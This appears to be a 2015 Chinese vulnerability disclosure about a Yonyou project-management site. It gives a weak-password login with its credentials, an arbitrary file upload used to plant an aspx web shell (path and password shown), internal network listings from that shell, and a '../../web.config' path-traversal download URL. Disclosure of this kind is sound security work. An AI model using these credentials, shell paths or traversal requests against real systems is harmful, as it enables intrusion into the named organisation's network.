### 简要描述:
getshell可威胁内网
### 详细说明:
目标地址:http://nczx.yonyou.com/SubModule/Login/index.aspx
[<img src="https://images.seebug.org/upload/201510/161618194cfeb75abeabcb49a4cfbcfe808002da.jpg" alt="QQ截图20151016161934.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/161618194cfeb75abeabcb49a4cfbcfe808002da.jpg)
1#帐号弱口令
帐号:liuni
密码:123456
登录系统后,发现功能还是蛮全的
[<img src="https://images.seebug.org/upload/201510/1621571765aa2ef0ef0db88379a3b441efdaeadf.jpg" alt="QQ截图20151016215821.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/1621571765aa2ef0ef0db88379a3b441efdaeadf.jpg)
[<img src="https://images.seebug.org/upload/201510/16215738733ed8610e3207d8f0f904c6c972bfb4.jpg" alt="QQ截图20151016215851.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/16215738733ed8610e3207d8f0f904c6c972bfb4.jpg)
在项目绿色通道功能处,发现一个上传点
2#任意文件上传
[<img src="https://images.seebug.org/upload/201510/16220726bb8fe6404277c5459cf6f9073635b35d.jpg" alt="QQ截图20151016215944.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/16220726bb8fe6404277c5459cf6f9073635b35d.jpg)
```
http://nczx.yonyou.com/SubModule/ProjectManage/RemoteTask.aspx?tasktype=2
```
可直接上传aspx马
[<img src="https://images.seebug.org/upload/201510/16220927148afc6520466900fa424e55384bdf33.jpg" alt="QQ截图20151016221038.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/16220927148afc6520466900fa424e55384bdf33.jpg)
上传后的地址经测试发现在
```
http://nczx.yonyou.com/SubModule/ProjectManage/RemoteTaskAttachs/tmp/62360545liuni/x.aspx
```
密码:F4ck
[<img src="https://images.seebug.org/upload/201510/162211297e219814ec49ba5f635a163537b19e57.jpg" alt="QQ截图20151016221219.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/162211297e219814ec49ba5f635a163537b19e57.jpg)
[<img src="https://images.seebug.org/upload/201510/162217077cae20a7e019f3c69da0e4fabf810e18.jpg" alt="QQ截图20151016221821.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/162217077cae20a7e019f3c69da0e4fabf810e18.jpg)
```
接口: 172.16.3.111 --- 0xa  Internet 地址         物理地址              类型  172.16.3.1            c4-ca-d9-36-76-e7     动态          172.16.3.27           00-e0-81-de-0d-90     动态          172.16.3.32           00-1a-4d-20-db-60     动态          172.16.3.54           00-e0-81-b9-4e-00     动态          172.16.3.92           00-1a-4b-de-3d-64     动态          172.16.3.100          00-1b-78-76-d7-96     动态          172.16.3.102          00-1a-4b-de-d5-d4     动态          172.16.3.103          00-11-25-8d-1f-58     动态          172.16.3.104          00-19-21-64-30-ec     动态          172.16.3.151          00-e0-81-d7-6d-6a     动态          172.16.3.155          00-e0-81-d1-ad-89     动态          172.16.3.189          00-e0-81-d0-0d-d9     动态          172.16.3.204          00-15-17-d4-07-fd     动态          172.16.3.255          ff-ff-ff-ff-ff-ff     静态          224.0.0.22            01-00-5e-00-00-16     静态          224.0.0.251           01-00-5e-00-00-fb     静态          224.0.0.252           01-00-5e-00-00-fc     静态          224.0.1.24            01-00-5e-00-01-18     静态          229.111.112.12        01-00-5e-6f-70-0c     静态          232.44.44.233         01-00-5e-2c-2c-e9     静态          239.5.5.5             01-00-5e-05-05-05     静态          239.255.255.250       01-00-5e-7f-ff-fa     静态          255.255.255.255       ff-ff-ff-ff-ff-ff     静态
```
可内网
[<img src="https://images.seebug.org/upload/201510/1622182596f9f30d0123fdd700242b98153dd562.jpg" alt="QQ截图20151016221922.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/1622182596f9f30d0123fdd700242b98153dd562.jpg)
 
### 漏洞证明:
```
服务器名称            注解-------------------------------------------------------------------------------\\CYLSERVER                                                                    \\NC-RM                                                                        \\NCSCMSERVER1                                                                 \\R520156                                                                      \\U8DBSERVER0                                                                  \\U8DRP2008                                                                    \\U8JC40                                                                       \\U8MANAGESERVER                                                               \\U8PATCHSRV                                                                   \\U8PATCHSRV2                                                                  \\UF200703040                                                                  \\UF201103043          uf201103043                                             \\UF201103061                                                                  命令成功完成。
```
[<img src="https://images.seebug.org/upload/201510/162219076a4159fc0e0040f834dd8e7e39dc71d9.jpg" alt="QQ截图20151016222004.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/162219076a4159fc0e0040f834dd8e7e39dc71d9.jpg)
3#任意文件下载(需要登录)
```
http://nczx.yonyou.com/SubModule/ProjectManage/Document/Download.aspx?destFileName=../../web.config
```
[<img src="https://images.seebug.org/upload/201510/162222140ff51253314b8a9d5ef620a49849a017.jpg" alt="QQ截图20151016222257.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/162222140ff51253314b8a9d5ef620a49849a017.jpg)
[<img src="https://images.seebug.org/upload/201510/1622220240149646a74c3ee7014929caf1c00723.jpg" alt="QQ截图20151016222314.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/1622220240149646a74c3ee7014929caf1c00723.jpg)
 
                      
                       
                    
                  
                
              
             
        
          
暂无评论